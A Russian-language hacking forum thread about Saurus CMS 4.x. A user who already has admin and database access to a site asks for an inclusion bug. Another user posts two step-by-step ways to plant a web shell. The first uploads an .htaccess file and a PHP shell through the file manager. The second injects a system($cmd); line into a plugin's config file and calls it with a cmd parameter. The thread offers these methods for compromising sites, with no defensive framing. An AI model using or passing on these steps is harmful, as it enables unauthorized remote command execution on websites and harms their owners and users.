Вечер добрый.Сталкивался ли кто с Saurus CMS ?

Версия: 4.5.x

register_globals: off

Исходник(приблизительный) двига: http://rghost.ru/35090981

Доступ в Бд и админку имеется

Мб кто инклуд нашёл ? С секурлиста уже проверил,инклуд имеет место быть,но в моем случае не покатит.

Удалось залиться в Saurus CMS CE Version 4.7 @ 01.12.2011 [http://www.saurus.info/get-saurus-cms/].

Необходимы права на использование файлового менеджера. [/admin/filemanager.php]

1. Авторизуемся, заходим: Tools -> Files

2. В папке shared [существует по-умолчанию] создаем папку shell.

3. В папку shell заливаем сначала .htaccess с содержимым: Allow from all, затем наш shell_script.php

4. Получаем шелл по адресу: http://[target]/shared/shell/shell_script.php

5. Радуемся =]

Еще один способ залиться.

Saurus CMS CE Version 4.7 @ 01.12.2011 [http://www.saurus.info/get-saurus-cms/].

1. Заходим на Оф.сайт [_http://www.saurus.info/get-extensions/], скачиваем любой плагин (мне приглянулся XML Sitemap 1.2 / Free).

2. В архиве saurus4_xml_sitemap1.2.zip находим файл extension.config.php

3. В файле extension.config.php дописываем что-то вроде system($cmd);

4. Авторизуемся, заходим: Extensions -> Extensions. Заливаем подкорректированный saurus4_xml_sitemap1.2.zip

5. Получаем шелл по адресу: http://[target]/extensions/saurus4_xml_sitemap/extension.config.php?cmd=[command]

Drager said:
Удалось залиться в
Saurus CMS CE Version 4.7
@ 01.12.2011 [http://www.saurus.info/get-saurus-cms/].
Необходимы права на использование файлового менеджера. [/admin/filemanager.php]
1. Авторизуемся, заходим:
Tools -> Files
2. В папке
shared
[существует по-умолчанию] создаем папку
shell
.
3. В папку
shell
заливаем сначала
.htaccess
с содержимым: Allow from all, затем наш
shell_script.php
4. Получаем шелл по адресу:
http://[target]/shared/shell/shell_script.php
5. Радуемся =]


Ага, разработчики красавцы